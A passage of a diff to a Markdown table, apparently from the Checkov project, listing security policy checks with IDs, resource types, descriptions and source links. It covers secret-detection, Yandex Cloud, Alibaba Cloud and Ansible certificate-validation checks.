Token | secrets | JSON Web Token | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3638 | CKV_SECRET_11 | Mailchimp Access Key | secrets | Mailchimp Access Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3639 | CKV_SECRET_12 | NPM tokens | secrets | NPM tokens | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3640 | CKV_SECRET_13 | Private Key | secrets | Private Key | secrets | 
[policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3641 | CKV_SECRET_14 | Slack Token | secrets | Slack Token | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3642 | CKV_SECRET_15 | SoftLayer Credentials | secrets | SoftLayer Credentials | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3643 | CKV_SECRET_16 | Square OAuth Secret | secrets | Square OAuth Secret | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3644 | CKV_SECRET_17 | Stripe Access Key | secrets | Stripe Access Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3645 | CKV_SECRET_18 | Twilio API Key | secrets | Twilio API Key | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3646 | CKV_SECRET_19 | Hex High Entropy String | secrets | Hex High Entropy String | secrets | [policy_metadata_integration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/common/bridgecrew/integration_features/features/policy_metadata_integration.py) | -| 3647 | CKV_TF_1 | module | module | Ensure Terraform module sources use a commit hash | Terraform | [RevisionHash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionHash.py) | -| 3648 | CKV_YC_1 | resource | 
yandex_mdb_clickhouse_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3649 | CKV_YC_1 | resource | yandex_mdb_elasticsearch_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3650 | CKV_YC_1 | resource | yandex_mdb_greenplum_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3651 | CKV_YC_1 | resource | yandex_mdb_kafka_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3652 | CKV_YC_1 | resource | yandex_mdb_mongodb_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3653 | CKV_YC_1 | resource | yandex_mdb_mysql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3654 | CKV_YC_1 | resource | yandex_mdb_postgresql_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3655 | CKV_YC_1 | resource | yandex_mdb_redis_cluster | Ensure security group is assigned to database cluster. 
| Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3656 | CKV_YC_1 | resource | yandex_mdb_sqlserver_cluster | Ensure security group is assigned to database cluster. | Terraform | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py) | -| 3657 | CKV_YC_2 | resource | yandex_compute_instance | Ensure compute instance does not have public IP. | Terraform | [ComputeVMPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMPublicIP.py) | -| 3658 | CKV_YC_3 | resource | yandex_storage_bucket | Ensure storage bucket is encrypted. | Terraform | [ObjectStorageBucketEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketEncryption.py) | -| 3659 | CKV_YC_4 | resource | yandex_compute_instance | Ensure compute instance does not have serial console enabled. | Terraform | [ComputeVMSerialConsole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSerialConsole.py) | -| 3660 | CKV_YC_5 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster does not have public IP address. | Terraform | [K8SPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SPublicIP.py) | -| 3661 | CKV_YC_6 | resource | yandex_kubernetes_node_group | Ensure Kubernetes cluster node group does not have public IP addresses. | Terraform | [K8SNodeGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupPublicIP.py) | -| 3662 | CKV_YC_7 | resource | yandex_kubernetes_cluster | Ensure Kubernetes cluster auto-upgrade is enabled. 
| Terraform | [K8SAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SAutoUpgrade.py) | -| 3663 | CKV_YC_8 | resource | yandex_kubernetes_node_group | Ensure Kubernetes node group auto-upgrade is enabled. | Terraform | [K8SNodeGroupAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupAutoUpgrade.py) | -| 3664 | CKV_YC_9 | resource | yandex_kms_symmetric_key | Ensure KMS symmetric key is rotated. | Terraform | [KMSSymmetricKeyRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/KMSSymmetricKeyRotation.py) | -| 3665 | CKV_YC_10 | resource | yandex_kubernetes_cluster | Ensure etcd database is encrypted with KMS key. | Terraform | [K8SEtcdKMSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SEtcdKMSEncryption.py) | -| 3666 | CKV_YC_11 | resource | yandex_compute_instance | Ensure security group is assigned to network interface. | Terraform | [ComputeVMSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSecurityGroup.py) | -| 3667 | CKV_YC_12 | resource | yandex_mdb_clickhouse_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3668 | CKV_YC_12 | resource | yandex_mdb_elasticsearch_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3669 | CKV_YC_12 | resource | yandex_mdb_greenplum_cluster | Ensure public IP is not assigned to database cluster. 
| Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3670 | CKV_YC_12 | resource | yandex_mdb_kafka_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3671 | CKV_YC_12 | resource | yandex_mdb_mongodb_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3672 | CKV_YC_12 | resource | yandex_mdb_mysql_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3673 | CKV_YC_12 | resource | yandex_mdb_postgresql_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3674 | CKV_YC_12 | resource | yandex_mdb_sqlserver_cluster | Ensure public IP is not assigned to database cluster. | Terraform | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py) | -| 3675 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure cloud member does not have elevated access. | Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | -| 3676 | CKV_YC_13 | resource | yandex_resourcemanager_cloud_iam_member | Ensure cloud member does not have elevated access. 
| Terraform | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py) | -| 3677 | CKV_YC_14 | resource | yandex_kubernetes_cluster | Ensure security group is assigned to Kubernetes cluster. | Terraform | [K8SSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SSecurityGroup.py) | -| 3678 | CKV_YC_15 | resource | yandex_kubernetes_node_group | Ensure security group is assigned to Kubernetes node group. | Terraform | [K8SNodeGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupSecurityGroup.py) | -| 3679 | CKV_YC_16 | resource | yandex_kubernetes_cluster | Ensure network policy is assigned to Kubernetes cluster. | Terraform | [K8SNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNetworkPolicy.py) | -| 3680 | CKV_YC_17 | resource | yandex_storage_bucket | Ensure storage bucket does not have public access permissions. | Terraform | [ObjectStorageBucketPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketPublicAccess.py) | -| 3681 | CKV_YC_18 | resource | yandex_compute_instance_group | Ensure compute instance group does not have public IP. | Terraform | [ComputeInstanceGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupPublicIP.py) | -| 3682 | CKV_YC_19 | resource | yandex_vpc_security_group | Ensure security group does not contain allow-all rules. 
| Terraform | [VPCSecurityGroupAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupAllowAll.py) | -| 3683 | CKV_YC_20 | resource | yandex_vpc_security_group_rule | Ensure security group rule is not allow-all. | Terraform | [VPCSecurityGroupRuleAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupRuleAllowAll.py) | -| 3684 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_binding | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | -| 3685 | CKV_YC_21 | resource | yandex_organizationmanager_organization_iam_member | Ensure organization member does not have elevated access. | Terraform | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py) | -| 3686 | CKV_YC_22 | resource | yandex_compute_instance_group | Ensure compute instance group has security group assigned. | Terraform | [ComputeInstanceGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupSecurityGroup.py) | -| 3687 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_binding | Ensure folder member does not have elevated access. | Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | -| 3688 | CKV_YC_23 | resource | yandex_resourcemanager_folder_iam_member | Ensure folder member does not have elevated access. 
| Terraform | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py) | -| 3689 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 3690 | CKV_YC_24 | resource | yandex_organizationmanager_organization_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 3691 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 3692 | CKV_YC_24 | resource | yandex_resourcemanager_cloud_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 3693 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_binding | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. 
| Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | -| 3694 | CKV_YC_24 | resource | yandex_resourcemanager_folder_iam_member | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible. | Terraform | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py) | +| | Id | Type | Entity | Policy | IaC | Resource Link | +|------|--------------------------|----------------------------------|--------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| 0 | CKV2_ADO_1 | resource | azuredevops_branch_policy_min_reviewers | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | +| 1 | CKV2_ADO_1 | resource | azuredevops_git_repository | Ensure at least two approving reviews for PRs | Terraform | [ADORepositoryHasMinTwoReviewers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azuredevops/ADORepositoryHasMinTwoReviewers.yaml) | +| 2 | CKV_ALI_1 | resource | alicloud_oss_bucket | Alibaba Cloud OSS bucket accessible to public | Terraform | 
[OSSBucketPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketPublic.py) | +| 3 | CKV_ALI_2 | resource | alicloud_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress22.py) | +| 4 | CKV_ALI_3 | resource | alicloud_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress3389.py) | +| 5 | CKV_ALI_4 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all regions | Terraform | [ActionTrailLogAllRegions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllRegions.py) | +| 6 | CKV_ALI_5 | resource | alicloud_actiontrail_trail | Ensure Action Trail Logging for all events | Terraform | [ActionTrailLogAllEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ActionTrailLogAllEvents.py) | +| 7 | CKV_ALI_6 | resource | alicloud_oss_bucket | Ensure OSS bucket is encrypted with Customer Master Key | Terraform | [OSSBucketEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketEncryptedWithCMK.py) | +| 8 | CKV_ALI_7 | resource | alicloud_disk | Ensure disk is encrypted | Terraform | [DiskIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskIsEncrypted.py) | +| 9 | CKV_ALI_8 | resource | alicloud_disk | Ensure Disk is encrypted with Customer Master Key | Terraform | 
[DiskEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/DiskEncryptedWithCMK.py) | +| 10 | CKV_ALI_9 | resource | alicloud_db_instance | Ensure database instance is not public | Terraform | [RDSIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSIsPublic.py) | +| 11 | CKV_ALI_10 | resource | alicloud_oss_bucket | Ensure OSS bucket has versioning enabled | Terraform | [OSSBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketVersioning.py) | +| 12 | CKV_ALI_11 | resource | alicloud_oss_bucket | Ensure OSS bucket has transfer Acceleration enabled | Terraform | [OSSBucketTransferAcceleration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketTransferAcceleration.py) | +| 13 | CKV_ALI_12 | resource | alicloud_oss_bucket | Ensure the OSS bucket has access logging enabled | Terraform | [OSSBucketAccessLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/OSSBucketAccessLogs.py) | +| 14 | CKV_ALI_13 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires minimum length of 14 or greater | Terraform | [RAMPasswordPolicyLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLength.py) | +| 15 | CKV_ALI_14 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one number | Terraform | [RAMPasswordPolicyNumber.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyNumber.py) | +| 16 | CKV_ALI_15 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one symbol | Terraform | 
[RAMPasswordPolicySymbol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicySymbol.py) | +| 17 | CKV_ALI_16 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy expires passwords within 90 days or less | Terraform | [RAMPasswordPolicyExpiration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyExpiration.py) | +| 18 | CKV_ALI_17 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one lowercase letter | Terraform | [RAMPasswordPolicyLowercaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyLowercaseLetter.py) | +| 19 | CKV_ALI_18 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy prevents password reuse | Terraform | [RAMPasswordPolicyReuse.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyReuse.py) | +| 20 | CKV_ALI_19 | resource | alicloud_ram_account_password_policy | Ensure RAM password policy requires at least one uppercase letter | Terraform | [RAMPasswordPolicyUppcaseLetter.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyUppcaseLetter.py) | +| 21 | CKV_ALI_20 | resource | alicloud_db_instance | Ensure RDS instance uses SSL | Terraform | [RDSInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceSSL.py) | +| 22 | CKV_ALI_21 | resource | alicloud_api_gateway_api | Ensure API Gateway API Protocol HTTPS | Terraform | [APIGatewayProtocolHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/APIGatewayProtocolHTTPS.py) | +| 23 | CKV_ALI_22 | resource | alicloud_db_instance | Ensure Transparent Data Encryption is Enabled on instance | 
Terraform | [RDSTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSTransparentDataEncryptionEnabled.py) | +| 24 | CKV_ALI_23 | resource | alicloud_ram_account_password_policy | Ensure Ram Account Password Policy Max Login Attempts not > 5 | Terraform | [RAMPasswordPolicyMaxLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMPasswordPolicyMaxLogin.py) | +| 25 | CKV_ALI_24 | resource | alicloud_ram_security_preference | Ensure RAM enforces MFA | Terraform | [RAMSecurityEnforceMFA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RAMSecurityEnforceMFA.py) | +| 26 | CKV_ALI_25 | resource | alicloud_db_instance | Ensure RDS Instance SQL Collector Retention Period should be greater than 180 | Terraform | [RDSRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSRetention.py) | +| 27 | CKV_ALI_26 | resource | alicloud_cs_kubernetes | Ensure Kubernetes installs plugin Terway or Flannel to support standard policies | Terraform | [K8sEnableNetworkPolicies.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sEnableNetworkPolicies.py) | +| 28 | CKV_ALI_27 | resource | alicloud_kms_key | Ensure KMS Key Rotation is enabled | Terraform | [KMSKeyRotationIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyRotationIsEnabled.py) | +| 29 | CKV_ALI_28 | resource | alicloud_kms_key | Ensure KMS Keys are enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/KMSKeyIsEnabled.py) | +| 30 | CKV_ALI_29 | resource | alicloud_alb_acl_entry_attachment | Alibaba ALB ACL does not restrict Access | Terraform | 
[ALBACLIsUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/ALBACLIsUnrestricted.py) | +| 31 | CKV_ALI_30 | resource | alicloud_db_instance | Ensure RDS instance auto upgrades for minor versions | Terraform | [RDSInstanceAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceAutoUpgrade.py) | +| 32 | CKV_ALI_31 | resource | alicloud_cs_kubernetes_node_pool | Ensure K8s nodepools are set to auto repair | Terraform | [K8sNodePoolAutoRepair.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sNodePoolAutoRepair.py) | +| 33 | CKV_ALI_32 | resource | alicloud_ecs_launch_template | Ensure launch template data disks are encrypted | Terraform | [LaunchTemplateDisksAreEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LaunchTemplateDisksAreEncrypted.py) | +| 34 | CKV_ALI_33 | resource | alicloud_slb_tls_cipher_policy | Alibaba Cloud Cypher Policy are secure | Terraform | [TLSPoliciesAreSecure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/TLSPoliciesAreSecure.py) | +| 35 | CKV_ALI_35 | resource | alicloud_db_instance | Ensure RDS instance has log_duration enabled | Terraform | [RDSInstanceLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogsEnabled.py) | +| 36 | CKV_ALI_36 | resource | alicloud_db_instance | Ensure RDS instance has log_disconnections enabled | Terraform | [RDSInstanceLogDisconnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogDisconnections.py) | +| 37 | CKV_ALI_37 | resource | alicloud_db_instance | Ensure RDS instance has log_connections enabled | Terraform | 
[RDSInstanceLogConnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogConnections.py) | +| 38 | CKV_ALI_38 | resource | alicloud_log_audit | Ensure log audit is enabled for RDS | Terraform | [LogAuditRDSEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LogAuditRDSEnabled.py) | +| 39 | CKV_ALI_41 | resource | alicloud_mongodb_instance | Ensure MongoDB is deployed inside a VPC | Terraform | [MongoDBInsideVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py) | +| 40 | CKV_ALI_42 | resource | alicloud_mongodb_instance | Ensure Mongodb instance uses SSL | Terraform | [MongoDBInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInstanceSSL.py) | +| 41 | CKV_ALI_43 | resource | alicloud_mongodb_instance | Ensure MongoDB instance is not public | Terraform | [MongoDBIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBIsPublic.py) | +| 42 | CKV_ALI_44 | resource | alicloud_mongodb_instance | Ensure MongoDB has Transparent Data Encryption Enabled | Terraform | [MongoDBTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBTransparentDataEncryptionEnabled.py) | +| 43 | CKV_ANSIBLE_1 | resource | [?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 44 | CKV_ANSIBLE_1 | resource | [?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 
45 | CKV_ANSIBLE_1 | resource | [].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 46 | CKV_ANSIBLE_1 | resource | [].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 47 | CKV_ANSIBLE_1 | resource | [].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 48 | CKV_ANSIBLE_1 | resource | [].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 49 | CKV_ANSIBLE_1 | resource | [].block[].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 50 | CKV_ANSIBLE_1 | resource | [].block[].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 51 | CKV_ANSIBLE_1 | resource | [].tasks[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | +| 52 | CKV_ANSIBLE_1 | 
